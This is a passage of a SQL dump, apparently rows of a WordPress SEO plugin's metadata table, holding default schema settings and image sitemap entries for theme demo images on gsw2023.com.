(85,1005,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/ic-demos-tiny.png\"}]','2023-08-13 02:20:04',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:20:04','2023-08-13 02:20:04'),
(86,1006,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/ic-features-tiny.png\"}]','2023-08-13 02:20:04',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:20:04','2023-08-13 02:20:04'),
(87,1007,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/ic-integration-tiny.png\"}]','2023-08-13 02:20:04',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:20:04','2023-08-13 02:20:04'),
(88,1008,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/ic-seven-demo-tiny.png\"}]','2023-08-13 02:20:04',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:20:04','2023-08-13 02:20:04'),
(89,1010,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/comment-icon-tiny.png\"}]','2023-08-13 02:20:04',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:20:05','2023-08-13 02:20:05'),
(90,1011,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/stars-rating-icon-tiny.png\"}]','2023-08-13 02:20:05',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:20:05','2023-08-13 02:20:05'),
(91,1032,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/the7-ipad-hd1.gif\"}]','2023-08-13 02:20:59',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:20:59','2023-08-13 02:20:59'),
(92,1033,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/the7-iphone-hd1.gif\"}]','2023-08-13 02:20:59',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:20:59','2023-08-13 02:20:59'),
(93,1034,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/the7-new-fav-hd1.gif\"}]','2023-08-13 02:20:59',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:20:59','2023-08-13 02:20:59'),
(94,1035,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/the7-new-fav1.gif\"}]','2023-08-13 02:20:59',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:20:59','2023-08-13 02:20:59'),
(95,1036,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/the7-old-ipad1.gif\"}]','2023-08-13 02:20:59',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:20:59','2023-08-13 02:20:59'),
(96,1046,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-constr.jpg\"}]','2023-08-13 02:20:59',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:20:59','2023-08-13 02:20:59'),
(97,1051,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-under-constr-02.jpg\"}]','2023-08-13 02:20:59',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:20:59','2023-08-13 02:20:59'),
(98,1056,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-under-constr-nav.jpg\"}]','2023-08-13 02:20:59',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:20:59','2023-08-13 02:20:59'),
(99,1058,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-business-one-page.jpg\"}]','2023-08-13 02:20:59',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:20:59','2023-08-13 02:20:59'),
(100,1166,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2017\\/01\\/bg-blur.jpg\"}]','2023-08-13 02:20:59',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:20:59','2023-08-13 02:20:59'),
(101,1167,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2017\\/01\\/3-r-tiny.png\"}]','2023-08-13 02:22:32',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:22:32','2023-08-13 02:22:32'),
(102,1168,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2017\\/01\\/l-3-tiny.png\"}]','2023-08-13 02:22:32',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:22:32','2023-08-13 02:22:32'),
(103,1169,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2017\\/01\\/2-l-tiny.png\"}]','2023-08-13 02:22:32',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:22:32','2023-08-13 02:22:32'),
(104,1170,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2017\\/01\\/2-r-tiny.png\"}]','2023-08-13 02:22:32',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:22:32','2023-08-13 02:22:32'),
(105,1171,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2017\\/01\\/l-1-tiny.png\"}]','2023-08-13 02:22:32',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:22:32','2023-08-13 02:22:32'),
(106,1172,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2017\\/01\\/r-1-tiny.png\"}]','2023-08-13 02:22:32',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:22:32','2023-08-13 02:22:32'),
(107,1173,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2017\\/01\\/art-m-tiny.png\"}]','2023-08-13 02:22:32',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:22:32','2023-08-13 02:22:32'),
(108,1174,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2017\\/01\\/vc-hero-tiny.png\"}]','2023-08-13 02:22:32',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:22:32','2023-08-13 02:22:32'),
(109,1175,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2017\\/01\\/addons-hero-tiny.png\"}]','2023-08-13 02:22:32',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:22:32','2023-08-13 02:22:32'),
(110,1176,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2017\\/01\\/slider-logo-img-tiny.png\"}]','2023-08-13 02:22:32',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:22:32','2023-08-13 02:22:32'),
(111,1182,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-creative-agency-1.jpg\"}]','2023-08-13 02:23:13',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:23:13','2023-08-13 02:23:13'),
(112,1183,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/d-hosting-1.jpg\"}]','2023-08-13 02:23:13',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:23:13','2023-08-13 02:23:13'),
